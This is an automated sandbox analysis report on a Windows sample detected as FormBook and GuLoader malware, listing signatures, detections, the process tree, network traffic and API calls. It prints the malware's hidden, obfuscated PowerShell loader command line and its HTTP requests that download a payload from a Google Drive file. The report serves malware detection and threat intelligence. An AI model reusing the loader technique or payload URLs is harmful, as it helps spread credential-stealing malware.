Edit tour

Windows Analysis Report
iwEnYIOol8.exe

Overview

General Information

Sample name:	iwEnYIOol8.exe renamed because original name is a hash value
Original sample name:	8944de6ca208c12dc7086ae70fc0375635bea9ae1b671fb1e54885f8b51b9c87.exe
Analysis ID:	1588748
MD5:	c759322828b728b406066f7d04170334
SHA1:	99a3b91e0bfba32c4884c6acc167da53ebb580db
SHA256:	8944de6ca208c12dc7086ae70fc0375635bea9ae1b671fb1e54885f8b51b9c87
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

iwEnYIOol8.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\iwEnYIOol8.exe" MD5: C759322828B728B406066F7D04170334)

powershell.exe (PID: 5832 cmdline: powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bldtvandsfiltrene166.exe (PID: 7500 cmdline: "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe" MD5: C759322828B728B406066F7D04170334)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1916889305.000000000B79C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe, ParentCommandLine: powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) ", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5832, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe", ProcessId: 7500, ProcessName: Bldtvandsfiltrene166.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) ", CommandLine: powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iwEnYIOol8.exe", ParentImage: C:\Users\user\Desktop\iwEnYIOol8.exe, ParentProcessId: 4636, ParentProcessName: iwEnYIOol8.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) ", ProcessId: 5832, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T05:00:58.164778+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49970	172.217.16.142	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: iwEnYIOol8.exe	ReversingLabs: Detection: 55%
Source: iwEnYIOol8.exe	Virustotal: Detection: 70%			Perma Link

Yara detected FormBook

Source: Yara match

File source: 0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: iwEnYIOol8.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.7:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.7:49971 version: TLS 1.2

Source: iwEnYIOol8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1915591946.0000000008B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: wntdll.pdbUGP source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2187907391.0000000020DEC000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2190343375.0000000020F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdbP source: powershell.exe, 00000002.00000002.1915591946.0000000008B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Bldtvandsfiltrene166.exe, Bldtvandsfiltrene166.exe, 0000000B.00000003.2187907391.0000000020DEC000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2190343375.0000000020F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49970 -> 172.217.16.142:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: iwEnYIOol8.exe, Bldtvandsfiltrene166.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1895859643.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: powershell.exe, 00000002.00000002.1914735082.00000000089E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.)U
Source: powershell.exe, 00000002.00000002.1914735082.00000000089E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cwT
Source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000002.00000002.1895859643.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.00000000052E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.00000000052E8000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2249267274.00000000056A0000.00000004.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.0000000005324000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4
Source: Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.00000000052E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4x
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2188352590.0000000005347000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2245387778.000000000534E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2040484830.000000000534E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.0000000005336000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.0000000005334000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188211545.0000000005334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=download
Source: Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.0000000005336000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.000000000533E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188386593.0000000005334000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2188211545.0000000005334000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=downloads
Source: powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443

Source: unknown	HTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.7:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.7:49971 version: TLS 1.2

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

E-Banking Fraud

Yara detected FormBook

Source: Yara match

File source: 0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_211B2DF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_211B2C70
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B35C0 NtCreateMutant,LdrInitializeThunk,	11_2_211B35C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B4340 NtSetContextThread,	11_2_211B4340
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B4650 NtSuspendThread,	11_2_211B4650
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2B60 NtClose,	11_2_211B2B60
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2B80 NtQueryInformationFile,	11_2_211B2B80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2BA0 NtEnumerateValueKey,	11_2_211B2BA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2BF0 NtAllocateVirtualMemory,	11_2_211B2BF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2BE0 NtQueryValueKey,	11_2_211B2BE0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2AB0 NtWaitForSingleObject,	11_2_211B2AB0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2AD0 NtReadFile,	11_2_211B2AD0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2AF0 NtWriteFile,	11_2_211B2AF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2D10 NtMapViewOfSection,	11_2_211B2D10
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2D00 NtSetInformationFile,	11_2_211B2D00
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2D30 NtUnmapViewOfSection,	11_2_211B2D30
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2DB0 NtEnumerateKey,	11_2_211B2DB0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2DD0 NtDelayExecution,	11_2_211B2DD0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2C00 NtQueryInformationProcess,	11_2_211B2C00
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2C60 NtCreateKey,	11_2_211B2C60
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2CA0 NtQueryInformationToken,	11_2_211B2CA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2CC0 NtQueryVirtualMemory,	11_2_211B2CC0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2CF0 NtOpenProcess,	11_2_211B2CF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2F30 NtCreateSection,	11_2_211B2F30
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2F60 NtCreateProcessEx,	11_2_211B2F60
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2F90 NtProtectVirtualMemory,	11_2_211B2F90
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2FB0 NtResumeThread,	11_2_211B2FB0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2FA0 NtQuerySection,	11_2_211B2FA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2FE0 NtCreateFile,	11_2_211B2FE0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2E30 NtWriteVirtualMemory,	11_2_211B2E30
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2E80 NtReadVirtualMemory,	11_2_211B2E80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2EA0 NtAdjustPrivilegesToken,	11_2_211B2EA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B2EE0 NtQueueApcThread,	11_2_211B2EE0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B3010 NtOpenDirectoryObject,	11_2_211B3010
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B3090 NtSetValueKey,	11_2_211B3090
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B39B0 NtGetContextThread,	11_2_211B39B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B3D10 NtOpenProcessToken,	11_2_211B3D10
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B3D70 NtOpenThread,	11_2_211B3D70

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_00406DC6	0_2_00406DC6
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Code function: 0_2_0040759D	0_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170100	11_2_21170100
